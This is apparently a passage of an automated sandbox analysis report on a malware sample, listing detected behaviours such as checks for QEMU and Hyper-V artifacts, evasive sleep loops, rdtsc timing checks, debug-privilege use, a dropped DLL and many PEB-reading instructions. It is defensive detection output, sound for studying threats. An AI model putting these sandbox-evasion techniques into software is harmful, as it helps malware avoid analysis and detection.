Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000004.00000002.3158860748.0000000009060000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 1544 Thread sleep time: -160000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0CE40 rdtsc 21_2_1EF0CE40
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9194 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe API coverage: 1.1 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07ED5E70 GetSystemInfo, 4_2_07ED5E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000016.00000000.2962923162.000000000D6C9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3217241697.000000000D6C9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3363785721.000000000D6C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: ielowutil.exe, 00000015.00000003.3480804459.000000000332F000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2876616616.0000000003365000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489499087.0000000003330000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.3482060149.0000000003365000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3490596692.0000000003365000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380165644.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126162706.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:%
Source: powershell.exe, 00000004.00000002.3158860748.0000000009060000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: firefox.exe, 0000001E.00000002.4154993499.00000231AF32F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0CE40 rdtsc 21_2_1EF0CE40
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC1EED mov eax, dword ptr fs:[00000030h] 21_2_1EEC1EED
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC1EED mov eax, dword ptr fs:[00000030h] 21_2_1EEC1EED
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC1EED mov eax, dword ptr fs:[00000030h] 21_2_1EEC1EED
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92EE8 mov eax, dword ptr fs:[00000030h] 21_2_1EE92EE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92EE8 mov eax, dword ptr fs:[00000030h] 21_2_1EE92EE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92EE8 mov eax, dword ptr fs:[00000030h] 21_2_1EE92EE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92EE8 mov eax, dword ptr fs:[00000030h] 21_2_1EE92EE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93EE2 mov eax, dword ptr fs:[00000030h] 21_2_1EE93EE2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF33EFC mov eax, dword ptr fs:[00000030h] 21_2_1EF33EFC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4EEE7 mov eax, dword ptr fs:[00000030h] 21_2_1EF4EEE7
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CEF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8CEF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CEF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8CEF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CEF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8CEF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CEF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8CEF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CEF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8CEF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CEF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8CEF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF59ED2 mov eax, dword ptr fs:[00000030h] 21_2_1EF59ED2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF17EC3 mov eax, dword ptr fs:[00000030h] 21_2_1EF17EC3
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF17EC3 mov ecx, dword ptr fs:[00000030h] 21_2_1EF17EC3
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED1ED8 mov eax, dword ptr fs:[00000030h] 21_2_1EED1ED8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64EC1 mov eax, dword ptr fs:[00000030h] 21_2_1EF64EC1
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBED0 mov eax, dword ptr fs:[00000030h] 21_2_1EECBED0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCEA0 mov eax, dword ptr fs:[00000030h] 21_2_1EECCEA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC2EB8 mov eax, dword ptr fs:[00000030h] 21_2_1EEC2EB8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC2EB8 mov eax, dword ptr fs:[00000030h] 21_2_1EEC2EB8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF50EAD mov eax, dword ptr fs:[00000030h] 21_2_1EF50EAD
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF50EAD mov eax, dword ptr fs:[00000030h] 21_2_1EF50EAD
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAE89 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAE89
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAE89 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAE89
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBBE80 mov eax, dword ptr fs:[00000030h] 21_2_1EEBBE80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8BE60 mov eax, dword ptr fs:[00000030h] 21_2_1EE8BE60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8BE60 mov eax, dword ptr fs:[00000030h] 21_2_1EE8BE60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4EE78 mov eax, dword ptr fs:[00000030h] 21_2_1EF4EE78
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64E62 mov eax, dword ptr fs:[00000030h] 21_2_1EF64E62
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91E70 mov eax, dword ptr fs:[00000030h] 21_2_1EE91E70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCE70 mov eax, dword ptr fs:[00000030h] 21_2_1EECCE70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC7E71 mov eax, dword ptr fs:[00000030h] 21_2_1EEC7E71
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0DE50 mov eax, dword ptr fs:[00000030h] 21_2_1EF0DE50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0DE50 mov eax, dword ptr fs:[00000030h] 21_2_1EF0DE50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0DE50 mov ecx, dword ptr fs:[00000030h] 21_2_1EF0DE50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0DE50 mov eax, dword ptr fs:[00000030h] 21_2_1EF0DE50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0DE50 mov eax, dword ptr fs:[00000030h] 21_2_1EF0DE50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBEE48 mov eax, dword ptr fs:[00000030h] 21_2_1EEBEE48
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8FE40 mov eax, dword ptr fs:[00000030h] 21_2_1EE8FE40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8AE40 mov eax, dword ptr fs:[00000030h] 21_2_1EE8AE40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8AE40 mov eax, dword ptr fs:[00000030h] 21_2_1EE8AE40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8AE40 mov eax, dword ptr fs:[00000030h] 21_2_1EE8AE40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8DE45 mov eax, dword ptr fs:[00000030h] 21_2_1EE8DE45
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8DE45 mov ecx, dword ptr fs:[00000030h] 21_2_1EE8DE45
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF26E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF26E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF26E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF26E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov ecx, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCE3F mov eax, dword ptr fs:[00000030h] 21_2_1EECCE3F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92E32 mov eax, dword ptr fs:[00000030h] 21_2_1EE92E32
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93E01 mov eax, dword ptr fs:[00000030h] 21_2_1EE93E01
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8BE18 mov ecx, dword ptr fs:[00000030h] 21_2_1EE8BE18
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64E03 mov eax, dword ptr fs:[00000030h] 21_2_1EF64E03
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC8E15 mov eax, dword ptr fs:[00000030h] 21_2_1EEC8E15
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93E14 mov eax, dword ptr fs:[00000030h] 21_2_1EE93E14
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93E14 mov eax, dword ptr fs:[00000030h] 21_2_1EE93E14
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93E14 mov eax, dword ptr fs:[00000030h] 21_2_1EE93E14
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64FFF mov eax, dword ptr fs:[00000030h] 21_2_1EF64FFF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA6FE0 mov eax, dword ptr fs:[00000030h] 21_2_1EEA6FE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB8FFB mov eax, dword ptr fs:[00000030h] 21_2_1EEB8FFB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4EFD3 mov eax, dword ptr fs:[00000030h] 21_2_1EF4EFD3
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8BFC0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8BFC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FFDC mov eax, dword ptr fs:[00000030h] 21_2_1EF0FFDC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FFDC mov eax, dword ptr fs:[00000030h] 21_2_1EF0FFDC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FFDC mov eax, dword ptr fs:[00000030h] 21_2_1EF0FFDC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FFDC mov ecx, dword ptr fs:[00000030h] 21_2_1EF0FFDC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FFDC mov eax, dword ptr fs:[00000030h] 21_2_1EF0FFDC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FFDC mov eax, dword ptr fs:[00000030h] 21_2_1EF0FFDC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE89FD0 mov eax, dword ptr fs:[00000030h] 21_2_1EE89FD0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11FC9 mov eax, dword ptr fs:[00000030h] 21_2_1EF11FC9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11FC9 mov eax, dword ptr fs:[00000030h] 21_2_1EF11FC9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11FC9 mov eax, dword ptr fs:[00000030h] 21_2_1EF11FC9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11FC9 mov eax, dword ptr fs:[00000030h] 21_2_1EF11FC9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11FC9 mov eax, dword ptr fs:[00000030h] 21_2_1EF11FC9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11FC9 mov eax, dword ptr fs:[00000030h] 21_2_1EF11FC9
